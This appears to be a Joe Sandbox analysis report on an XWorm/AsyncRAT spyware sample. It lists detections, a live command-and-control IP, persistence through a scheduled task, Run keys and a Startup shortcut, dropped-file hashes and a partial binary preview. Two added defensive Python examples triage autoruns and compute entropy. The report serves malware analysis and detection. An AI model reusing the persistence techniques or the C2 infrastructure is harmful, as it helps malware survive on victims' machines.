file.exe | 100% | Avira | TR/Spy.Gen
file.exe | 100% | Joe Sandbox ML |

Dropped file
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Word.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\Word.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Word.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
http://www.microsoft.co~ | 0% | Avira URL Cloud | safe
103.230.121.124 | 0% | Avira URL Cloud | safe
http://osoft.co | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high

Contacted IPs and URLs
Name | Malicious | Antivirus Detection | Reputation
103.230.121.124 | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high
URLs found in memory and binary data. The source column names the process and the memory dump (.sdmp) the string was carved from; entries such as http://crl.m, http://crl.mic, http://www.microsoft.c and http://osoft.co are truncated fragments of strings in PowerShell memory, not URLs the sample was observed contacting. None is flagged malicious.

http://nuget.org/NuGet.exe  (malicious: false; reputation: high)
    Source: powershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp
http://crl.m  (malicious: false; reputation: high)
    Source: powershell.exe, 0000000B.00000002.1451558022.000001D169939000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1827907029.0000024E3F432000.00000004.00000020.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/soap/encoding/  (malicious: false; reputation: high)
    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/wsdl/  (malicious: false; reputation: high)
    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D1517F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe  (malicious: false; reputation: high)
    Source: powershell.exe, 00000007.00000002.1321120516.0000022D4B1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1438468730.000001D1614B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1588201996.000001661006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/License  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp
http://crl.mic  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmp
https://contoso.com/Icon  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1790369343.0000024E36CFD000.00000004.00000800.00020000.00000000.sdmp
http://osoft.co  (malicious: false; Avira URL Cloud: safe; reputation: unknown)
    Source: powershell.exe, 00000007.00000002.1335289999.0000022D539F9000.00000004.00000020.00020000.00000000.sdmp
http://crl.micft.cMicRosof  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1824109278.0000024E3F346000.00000004.00000020.00020000.00000000.sdmp
https://aka.ms/pscore68  (malicious: false; reputation: high)
    Source: powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmp
http://www.microsoft.c  (malicious: false; reputation: high)
    Source: powershell.exe, 0000000B.00000002.1451558022.000001D169961000.00000004.00000020.00020000.00000000.sdmp
http://www.microsoft.co~  (malicious: false; Avira URL Cloud: safe; reputation: unknown)
    Source: powershell.exe, 0000000E.00000002.1615577139.0000016677A06000.00000004.00000020.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name  (malicious: false; reputation: high)
    Source: file.exe, 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1304950670.0000022D3B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1373555805.000001D151441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1478158258.0000016600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1652250573.0000024E26C91000.00000004.00000800.00020000.00000000.sdmp
https://github.com/Pester/Pester  (malicious: false; reputation: high)
    Source: powershell.exe, 00000010.00000002.1652250573.0000024E26EB9000.00000004.00000800.00020000.00000000.sdmp
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
103.230.121.124 | unknown | Hong Kong | 62468 | VPSQUANUS | true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1565292
                                                        Start date and time:2024-11-29 15:18:09 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 36s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:27
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:file.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@20/21@1/2
                                                        EGA Information:
                                                        • Successful, ratio: 11.1%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 128
                                                        • Number of non-executed functions: 8
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target Word.exe, PID 316 because it is empty
                                                        • Execution Graph export aborted for target Word.exe, PID 4016 because it is empty
                                                        • Execution Graph export aborted for target Word.exe, PID 4308 because it is empty
                                                        • Execution Graph export aborted for target Word.exe, PID 8184 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7020 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: file.exe
Time | Type | Description
09:19:05 | API Interceptor | 68475x Sleep call for process: file.exe modified
09:19:09 | API Interceptor | 57x Sleep call for process: powershell.exe modified
11:14:31 | API Interceptor | 4x Sleep call for process: Word.exe modified
17:14:30 | Task Scheduler | Run new task: Word, path: C:\Users\user\AppData\Roaming\Word.exe
17:14:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value Word = C:\Users\user\AppData\Roaming\Word.exe
17:14:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value Word = C:\Users\user\AppData\Roaming\Word.exe
17:14:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnk
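The scheduled task, both Run-key values and the Startup-folder shortcut above all resolve to the same dropped binary, C:\Users\user\AppData\Roaming\Word.exe. That redundancy is what makes the artifact easy to hunt: one target persisted through several mechanisms, sitting directly in the %APPDATA% root rather than in a vendor folder, under a name borrowed from Microsoft Office. The Python below is an added example written for this page, not part of the Joe Sandbox report or its tooling; it triages an autorun inventory with exactly those three heuristics. The inventory rows are constructed from the report's four persistence events plus one benign control row (on a live host they would be collected from the Run keys, the task scheduler and the Startup folder), and the mimicked-name list and trusted roots are the author's assumptions to be replaced with a local baseline.

```python
import re
from collections import defaultdict

# Constructed inventory: the four persistence events from the report above,
# rewritten as autorun rows, plus one benign control row. On a live host these
# rows would come from the HKCU/HKLM Run keys, the task scheduler and the
# per-user Startup folder, not from a hard-coded list.
AUTORUN_INVENTORY = [
    {"mechanism": "ScheduledTask", "name": "Word",
     "target": r"C:\Users\user\AppData\Roaming\Word.exe"},
    {"mechanism": "RunKey",
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Word",
     "target": r"C:\Users\user\AppData\Roaming\Word.exe"},
    {"mechanism": "RunKey",
     "name": r"HKCU64\Software\Microsoft\Windows\CurrentVersion\Run\Word",
     "target": r"C:\Users\user\AppData\Roaming\Word.exe"},
    {"mechanism": "StartupFolder", "name": "Word.lnk",
     "target": r"C:\Users\user\AppData\Roaming\Word.exe"},
    # benign control (constructed): a vendor binary in its normal install path
    {"mechanism": "RunKey", "name": r"HKCU\...\Run\OneDrive",
     "target": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

# An .exe directly in the root of %APPDATA% (...\AppData\Roaming\<name>.exe),
# with no vendor subfolder, is rare for legitimate software and is exactly
# where this sample drops its copy.
APPDATA_ROOT_EXE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming\\[^\\]+\.exe$", re.IGNORECASE)

# Names this family and the related samples on the page borrow from legitimate
# software (Word.exe, svchost.exe, Chrome.exe, Registry.exe). Assumed list.
MIMICKED_NAMES = {"word.exe", "excel.exe", "outlook.exe", "svchost.exe",
                  "chrome.exe", "registry.exe", "explorer.exe"}

# Locations where those names are legitimate (assumed).
TRUSTED_ROOTS = ("c:\\program files", "c:\\program files (x86)", "c:\\windows")


def normalize_target(raw: str) -> str:
    """Reduce an autorun command line to its lower-cased executable path so
    that quoted/unquoted variants and trailing arguments group together."""
    raw = raw.strip()
    if raw.startswith('"'):
        exe = raw[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.+?\.exe)(\s|$)", raw, re.IGNORECASE)
        exe = m.group(1) if m else raw
    return exe.lower()


def triage(inventory):
    """Group autorun rows by executable and return one finding per target
    that trips at least one heuristic, with the reasons spelled out."""
    by_target = defaultdict(list)
    for row in inventory:
        by_target[normalize_target(row["target"])].append(row)

    findings = []
    for target, rows in sorted(by_target.items()):
        reasons = []
        basename = target.rsplit("\\", 1)[-1]
        if APPDATA_ROOT_EXE.match(target):
            reasons.append("executable placed directly in the %APPDATA% root")
        if basename in MIMICKED_NAMES and not target.startswith(TRUSTED_ROOTS):
            reasons.append(f"{basename} runs from outside its legitimate location")
        mechanisms = sorted({r["mechanism"] for r in rows})
        if len(mechanisms) >= 2:
            reasons.append("same binary persisted via " + ", ".join(mechanisms))
        if reasons:
            findings.append({"target": target, "entries": len(rows),
                             "mechanisms": mechanisms, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(AUTORUN_INVENTORY):
        print(f"[!] {f['target']}  ({f['entries']} autorun entries)")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

Grouping by normalized target before scoring is the important step: each mechanism on its own produces noise (plenty of legitimate software writes a Run value), but the same unsigned binary registered in a task, two Run keys and the Startup folder within twenty seconds is rarely anything but persistence tooling.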
Context for contacted IPs (other samples seen with the same IP)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Enquiry.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | word.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | svchost.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Chrome.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Registry.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | OC LICITACI#U00d3N DICIEMBRE_24.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | VzhY4BcvBH.exe | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | ip-api.com/line/?fields=hosting
103.230.121.124 | word.exe | malicious | XWorm |
103.230.121.124 | svchost.exe | malicious | XWorm |
103.230.121.124 | Chrome.exe | malicious | XWorm |
103.230.121.124 | Registry.exe | malicious | XWorm |
Context for contacted domains (other samples seen with the same domain)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Enquiry.js | malicious | AgentTesla | 208.95.112.1
ip-api.com | 8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
ip-api.com | https://www.scrolldroll.com/best-dialogues-from-asur/ | malicious | Unknown | 208.95.112.2
ip-api.com | Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | word.exe | malicious | XWorm | 208.95.112.1
ip-api.com | svchost.exe | malicious | XWorm | 208.95.112.1
ip-api.com | Chrome.exe | malicious | XWorm | 208.95.112.1
ip-api.com | Registry.exe | malicious | XWorm | 208.95.112.1
ip-api.com | OC LICITACI#U00d3N DICIEMBRE_24.exe | malicious | AgentTesla | 208.95.112.1
Context for contacted ASNs (other samples seen with the same ASN)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VPSQUANUS | word.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | svchost.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | Chrome.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | Registry.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | qkbfi86.elf | malicious | Mirai | 103.252.19.63
VPSQUANUS | amen.arm.elf | malicious | Unknown | 43.225.59.17
VPSQUANUS | AIYi17AyGz.exe | malicious | Metasploit, Meterpreter | 198.44.176.141
VPSQUANUS | o88dYvhfkt.exe | malicious | CobaltStrike, Metasploit | 156.224.21.148
VPSQUANUS | file.exe | malicious | Sliver | 198.44.168.104
VPSQUANUS | sBX8VM67ZE.exe | malicious | FormBook | 23.251.54.212
TUT-ASUS | Enquiry.js | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
TUT-ASUS | https://www.scrolldroll.com/best-dialogues-from-asur/ | malicious | Unknown | 208.95.112.2
TUT-ASUS | Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | word.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | svchost.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | Chrome.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | Registry.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | OC LICITACI#U00d3N DICIEMBRE_24.exe | malicious | AgentTesla | 208.95.112.1
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\AppData\Roaming\Word.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):654
                                                                Entropy (8bit):5.380476433908377
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
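The "Entropy (8bit)" figure in each dropped-file record is the Shannon entropy of the file's bytes in bits per byte: plain text such as the 60-byte AppLocker test script lands around 4, a mostly-NUL structure such as the 64-byte file above lands near 0, and encrypted or packed payloads approach 8. The Python below is an added example written for this page, not part of the Joe Sandbox report or its tooling. Its 64-byte buffer is constructed (61 NUL bytes plus three distinct bytes), which reproduces the reported 0.34726597... from the file's shape alone since the real bytes are not on the page; the 7.2 cut-off for "encrypted-looking" is an assumption, not Joe Sandbox's documented rule for its Encrypted flag.

```python
import math
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0).

    This is the statistic reported as "Entropy (8bit)" for each dropped
    file: -sum(p_i * log2(p_i)) over the byte values that occur.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Assumed cut-off for "looks encrypted or packed". Joe Sandbox's own rule for
# its Encrypted:true flag is not stated on the page; 7.2 is a common triage
# heuristic (compressed/encrypted data sits above it, text and code far below).
ENCRYPTED_LOOKING_THRESHOLD = 7.2


def classify(data: bytes) -> str:
    """Coarse triage label from entropy alone, useful for ordering dropped
    files before opening any of them."""
    h = shannon_entropy_8bit(data)
    if h >= ENCRYPTED_LOOKING_THRESHOLD:
        return "encrypted-or-packed"
    if h >= 3.5:
        return "text-or-structured"
    return "sparse-or-padded"


# Constructed sample: 61 NUL bytes plus three distinct bytes ('@', 'e', 0x01).
# A 64-byte file of this shape has entropy 0.34726597..., the value the report
# lists for the 64-byte dropped file whose preview reads "@...e...".
SPARSE_SAMPLE = b"@\x00\x00\x00e" + b"\x00" * 58 + b"\x01"

# Constructed sample with every byte value equally frequent: entropy exactly 8.0.
UNIFORM_SAMPLE = bytes(range(256)) * 4

# Constructed sample of plain ASCII text (entropy in the 4-bit range).
TEXT_SAMPLE = b"# PowerShell test file to determine AppLocker lockdown mode"


if __name__ == "__main__":
    for name, buf in [("sparse", SPARSE_SAMPLE), ("text", TEXT_SAMPLE),
                      ("uniform", UNIFORM_SAMPLE)]:
        print(f"{name:8s} {len(buf):5d} bytes  "
              f"entropy={shannon_entropy_8bit(buf):.6f}  {classify(buf)}")
```

Entropy alone does not prove encryption (a compressed archive or a PNG scores just as high), but combined with the file type and the dropping process it tells you which of the 21 dropped files deserve a look first: the PowerShell policy-test files and the CLR assembly cache CSV above are noise, a high-entropy blob written by the sample itself would not be.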
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):41
                                                                Entropy (8bit):3.7195394315431693
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 29 15:14:30 2024, mtime=Fri Nov 29 15:14:30 2024, atime=Fri Nov 29 15:14:30 2024, length=445952, window=hide
                                                                Category:dropped
                                                                Size (bytes):751
                                                                Entropy (8bit):5.114229217806899
                                                                Encrypted:false
                                                                SSDEEP:12:8HoO4dHN+2ChTzi1Y//h4GkSLYkT58ZWjA7NHM8KUmnzZrNrzBmV:8HadM2Cz9p41sTuQAYnzhttm
                                                                MD5:19B373C62DE6143CA961B31C45B685D6
                                                                SHA1:62A7555E38561DFC5583C904AB5B776C7C78E0D6
                                                                SHA-256:E1F142B8F416450D00418C25BCFBE24BFDA92D8C4C223060638633D77E397524
                                                                SHA-512:62C5F85745170D13E02491763C9D54F7D33C0CBDD0C60C686DB6C40B9D11FD9A948797C249C86DB7FA99E16FCB8DFC6ACDCBD780AED59228F5F6501ECF912C2C
                                                                Malicious:false
                                                                Preview:L..................F.... ....^..yB...^..yB...^..yB..........................n.:..DG..Yr?.D..U..k0.&...&......Qg.*_.....~.iB...5..yB......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=}Y...........................3*N.A.p.p.D.a.t.a...B.V.1.....}Y`r..Roaming.@......EW.=}Y`r..........................'_..R.o.a.m.i.n.g.....Z.2.....}Y. .Word.exe..B......}Y.}Y.....! ....................jE#.W.o.r.d...e.x.e.......Z...............-.......Y............'.L.....C:\Users\user\AppData\Roaming\Word.exe........\.....\.....\.....\.....\.W.o.r.d...e.x.e.`.......X.......141700...........hT..CrF.f4... .]I..l....,......hT..CrF.f4... .]I..l....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):445952
                                                                Entropy (8bit):3.1734028805631276
                                                                Encrypted:false
                                                                SSDEEP:1536:5JVcMJ4tjdLCPwUtdcbwdpmnC6QOvdtvMd5S4Z96:504oBCxtdcbwd9O1RcS4ZE
                                                                MD5:9FF920C7C3199DBFFF9B507272C9F65A
                                                                SHA1:8A588FB79066649ADCDF2F5F1614D6858F0E4AC6
                                                                SHA-256:F790A1104F5EEC4B7C03064D9063C9E69D1F55E5BCE27AD83474FB2AA00310E9
                                                                SHA-512:BF3972D2BB7D819E6448651F14E7B465D3A4C92E2ECF747803FBC8E7E9E6CFF6B693E972F9729D56FB320316E2E51C751907E99EAE42F9309DB0241998954877
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uD;g............................><... ...@....@.. ....................... ............@..................................;..O....@.............................................................................. ............... ..H............text...D.... ...................... ..`.rsrc.......@....... ..............@..@.reloc..............................@..B................ <......H........n..........&.....................................................(....*.r...p*. .8F.*..(....*.r!..p*. [.x.*.s.........s.........s.........s.........*.rA..p*. .y4.*.ra..p*. ...*.r...p*. *p{.*.r...p*. ....*.r...p*. /?..*..((...*.r...p*. u}..*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&('...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ....*.r...p*. ....*.r?..p*. S...*.r_..p*. .B].*.r...p*. ....*.r...p*. ...*.r..
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):3.1734028805631276
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:file.exe
                                                                File size:445'952 bytes
                                                                MD5:9ff920c7c3199dbfff9b507272c9f65a
                                                                SHA1:8a588fb79066649adcdf2f5f1614d6858f0e4ac6
